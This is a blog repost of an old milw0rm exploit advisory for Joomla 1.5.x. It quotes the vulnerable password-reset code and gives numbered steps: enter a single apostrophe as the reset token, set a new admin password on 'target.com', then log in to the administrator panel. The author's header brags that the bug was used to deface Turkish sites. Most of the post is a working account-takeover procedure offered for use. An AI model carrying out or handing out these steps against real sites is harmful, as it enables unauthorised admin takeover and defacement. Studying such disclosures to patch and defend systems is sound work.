Monday, June 8, 2009

Vulnerability: Joomla 1.5.x (Token) Remote Admin Change Password


Joomla 1.5.x (Token) Remote Admin Change Password Vulnerability. Following below steps:

  1: #####################################################################################
  2: ####                     Joomla 1.5.x Remote Admin Password Change               ####
  3: #####################################################################################
  4: #                                                                                   #
  5: # Author: d3m0n (d3m0n@o2.pl)                                                       #
  6: # Greets: GregStar, gorion, d3d!k                                                   #
  7: #                                                                                   #
  8: # Polish "hackers" used this bug to deface turkish sites BUAHAHHA nice 0-day pff    #
  9: #                                                                                   #
 10: #####################################################################################
 11: 
 12: 
 13: 
 14: File : /components/com_user/controller.php
 15: 
 16: #####################################################################################
 17: Line : 379-399
 18:  
 19: 	function confirmreset()
 20: 	{
 21: 		// Check for request forgeries
 22: 		JRequest::checkToken() or die( 'Invalid Token' );
 23: 
 24: 		// Get the input
 25: 		$token = JRequest::getVar('token', null, 'post', 'alnum');              < ---  
 26:                   
 27: 		// Get the model
 28: 		$model = &$this->getModel('Reset');
 29: 
 30: 		// Verify the token
 31: 		if ($model->confirmReset($token) === false)   < --- 
 32: 		{
 33: 			$message = JText::sprintf('PASSWORD_RESET_CONFIRMATION_FAILED', $model->getError());
 34: 			$this->setRedirect('index.php?option=com_user&view=reset&layout=confirm', $message);
 35: 			return false;
 36: 		}
 37: 
 38: 		$this->setRedirect('index.php?option=com_user&view=reset&layout=complete');
 39: 	}
 40: 	
 41: #####################################################################################
 42: 	
 43: File : /components/com_user/models/reset.php
 44: 
 45: Line: 111-130 	
 46: 	
 47: 	
 48: 	
 49: 	function confirmReset($token)
 50: 	{
 51: 		global $mainframe;
 52: 
 53: 		$db	= &JFactory::getDBO();
 54: 		$db->setQuery('SELECT id FROM #__users WHERE block = 0 AND activation = '.$db->Quote($token));  < ----  
 55: 
 56: 		// Verify the token
 57: 		if (!($id = $db->loadResult()))
 58: 		{
 59: 			$this->setError(JText::_('INVALID_TOKEN'));
 60: 			return false;
 61: 		}
 62: 
 63: 		// Push the token and user id into the session
 64: 		$mainframe->setUserState($this->_namespace.'token',	$token);
 65: 		$mainframe->setUserState($this->_namespace.'id',	$id);
 66: 
 67: 		return true;
 68: 	}
 69: #####################################################################################
 70: 
 71: 
 72: 
 73:  - Replace ' with empty char
 74:  - If you enter ' in token field then query will be looks like : "SELECT id FROM jos_users WHERE block = 0 AND activation = '' "
 75: 
 76: 
 77: Example :
 78: 
 79: 
 80: 1. Go to url : target.com/index.php?option=com_user&view=reset&layout=confirm
 81: 
 82: 2. Write into field "token" char ' and Click OK.
 83: 
 84: 3. Write new password for admin
 85: 
 86: 4. Go to url : target.com/administrator/
 87: 
 88: 5. Login admin with new password
 89: 
 90: # milw0rm.com [2008-08-12]
 91:
author

This post was written by: Franklin Manuel

Franklin Manuel is a professional blogger, web designer and front end web developer. Follow him on Twitter

0 Responses to “Vulnerability: Joomla 1.5.x (Token) Remote Admin Change Password”

Post a Comment

Subscribe to: Post Comments (Atom)